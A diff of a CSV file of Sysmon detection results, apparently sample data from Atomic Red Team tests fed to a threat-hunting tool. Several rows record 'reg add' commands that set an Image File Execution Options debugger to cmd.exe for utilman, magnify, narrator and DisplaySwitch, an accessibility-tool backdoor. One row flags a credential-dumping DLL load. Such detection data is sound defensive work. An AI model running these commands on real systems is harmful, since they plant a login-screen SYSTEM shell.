+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
+    <Data Name=""ParentProcessId"">3912</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""ParentCommandLine"">powershell</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563547819.467476,2019-07-19T18:50:19.467476+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-19T14:50:18.009564Z"">
+    </TimeCreated>
+    <EventRecordID>3752</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2796"" ThreadID=""3592"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-19 14:50:18.000</Data>
+    <Data Name=""ProcessGuid"">747F3D96-D8AA-5D31-0000-0010C0C93200</Data>
+    <Data Name=""ProcessId"">6016</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c </Data>
+    <Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
+    <Data Name=""LogonId"">0x50951</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
+    <Data Name=""ParentProcessId"">3912</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""ParentCommandLine"">powershell</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563547817.963904,2019-07-19T18:50:17.963904+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;reg add &quot; HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution &quot;Options\DisplaySwitch.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-19T14:50:17.941637Z"">
+    </TimeCreated>
+    <EventRecordID>3749</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2796"" ThreadID=""3592"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-19 14:50:17.916</Data>
+    <Data Name=""ProcessGuid"">747F3D96-D8A9-5D31-0000-001072C43200</Data>
+    <Data Name=""ProcessId"">6068</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;reg add &quot; HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution &quot;Options\DisplaySwitch.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f&quot;</Data>
+    <Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
+    <Data Name=""LogonId"">0x50951</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
+    <Data Name=""ParentProcessId"">3912</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""ParentCommandLine"">powershell</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563547817.941637,2019-07-19T18:50:17.941637+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-19T14:50:14.827321Z"">
+    </TimeCreated>
+    <EventRecordID>3748</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2796"" ThreadID=""3592"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-19 14:50:14.762</Data>
+    <Data Name=""ProcessGuid"">747F3D96-D8A6-5D31-0000-0010F9B13200</Data>
+    <Data Name=""ProcessId"">6664</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c </Data>
+    <Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
+    <Data Name=""LogonId"">0x50951</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
+    <Data Name=""ParentProcessId"">3912</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""ParentCommandLine"">powershell</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563547814.692289,2019-07-19T18:50:14.692289+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;reg add &quot; HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution &quot;Options\narrator.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-19T14:50:14.678185Z"">
+    </TimeCreated>
+    <EventRecordID>3745</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2796"" ThreadID=""3592"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-19 14:50:14.649</Data>
+    <Data Name=""ProcessGuid"">747F3D96-D8A6-5D31-0000-001053A73200</Data>
+    <Data Name=""ProcessId"">6888</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;reg add &quot; HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution &quot;Options\narrator.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f&quot;</Data>
+    <Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
+    <Data Name=""LogonId"">0x50951</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
+    <Data Name=""ParentProcessId"">3912</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""ParentCommandLine"">powershell</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563547814.678185,2019-07-19T18:50:14.678185+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-19T14:50:13.185016Z"">
+    </TimeCreated>
+    <EventRecordID>3744</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2796"" ThreadID=""3592"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-19 14:50:13.173</Data>
+    <Data Name=""ProcessGuid"">747F3D96-D8A5-5D31-0000-0010C0A03200</Data>
+    <Data Name=""ProcessId"">6116</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c </Data>
+    <Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
+    <Data Name=""LogonId"">0x50951</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
+    <Data Name=""ParentProcessId"">3912</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""ParentCommandLine"">powershell</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563547813.127595,2019-07-19T18:50:13.127595+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;reg add &quot; HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution &quot;Options\magnify.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-19T14:50:13.109148Z"">
+    </TimeCreated>
+    <EventRecordID>3741</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2796"" ThreadID=""3592"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-19 14:50:13.096</Data>
+    <Data Name=""ProcessGuid"">747F3D96-D8A5-5D31-0000-0010729B3200</Data>
+    <Data Name=""ProcessId"">4212</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;reg add &quot; HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution &quot;Options\magnify.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f&quot;</Data>
+    <Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
+    <Data Name=""LogonId"">0x50951</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
+    <Data Name=""ParentProcessId"">3912</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""ParentCommandLine"">powershell</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563547813.109148,2019-07-19T18:50:13.109148+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-19T14:50:10.324832Z"">
+    </TimeCreated>
+    <EventRecordID>3740</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2796"" ThreadID=""3592"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-19 14:50:10.306</Data>
+    <Data Name=""ProcessGuid"">747F3D96-D8A2-5D31-0000-0010D8943200</Data>
+    <Data Name=""ProcessId"">2484</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c </Data>
+    <Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
+    <Data Name=""LogonId"">0x50951</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
+    <Data Name=""ParentProcessId"">3912</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""ParentCommandLine"">powershell</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563547810.282757,2019-07-19T18:50:10.282757+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;reg add &quot; HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution &quot;Options\utilman.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-19T14:50:10.266630Z"">
+    </TimeCreated>
+    <EventRecordID>3737</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2796"" ThreadID=""3592"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-19 14:50:10.253</Data>
+    <Data Name=""ProcessGuid"">747F3D96-D8A2-5D31-0000-00108A8F3200</Data>
+    <Data Name=""ProcessId"">6156</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;reg add &quot; HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution &quot;Options\utilman.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f&quot;</Data>
+    <Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
+    <Data Name=""LogonId"">0x50951</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
+    <Data Name=""ParentProcessId"">3912</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""ParentCommandLine"">powershell</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563547810.26663,2019-07-19T18:50:10.266630+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-19T14:50:07.357083Z"">
+    </TimeCreated>
+    <EventRecordID>3736</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2796"" ThreadID=""3592"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-19 14:50:07.335</Data>
+    <Data Name=""ProcessGuid"">747F3D96-D89F-5D31-0000-0010BC823200</Data>
+    <Data Name=""ProcessId"">2404</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c </Data>
+    <Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
+    <Data Name=""LogonId"">0x50951</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
+    <Data Name=""ParentProcessId"">3912</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""ParentCommandLine"">powershell</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[  T1003 ] Credential Dumping ImageLoad,1603194669.842764,2020-10-20T15:51:09.842764+04:00,,Threat,Medium,[  T1003 ] Credential Dumping ImageLoad,7,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>7</EventID>
+    <Version>3</Version>
+    <Level>4</Level>
+    <Task>7</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-10-20T11:51:09.842559Z"">
+    </TimeCreated>
+    <EventRecordID>1103</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""7212"" ThreadID=""5064"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>DESKTOP-NTSSLJD</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName"">-</Data>
+    <Data Name=""UtcTime"">2020-10-20 11:51:09.588</Data>
+    <Data Name=""ProcessGuid"">23F38D93-CEB4-5F8E-9F08-000000000C00</Data>
+    <Data Name=""ProcessId"">9392</Data>
+    <Data Name=""Image"">C:\Windows\System32\mmc.exe</Data>
+    <Data Name=""ImageLoaded"">C:\Windows\System32\samlib.dll</Data>
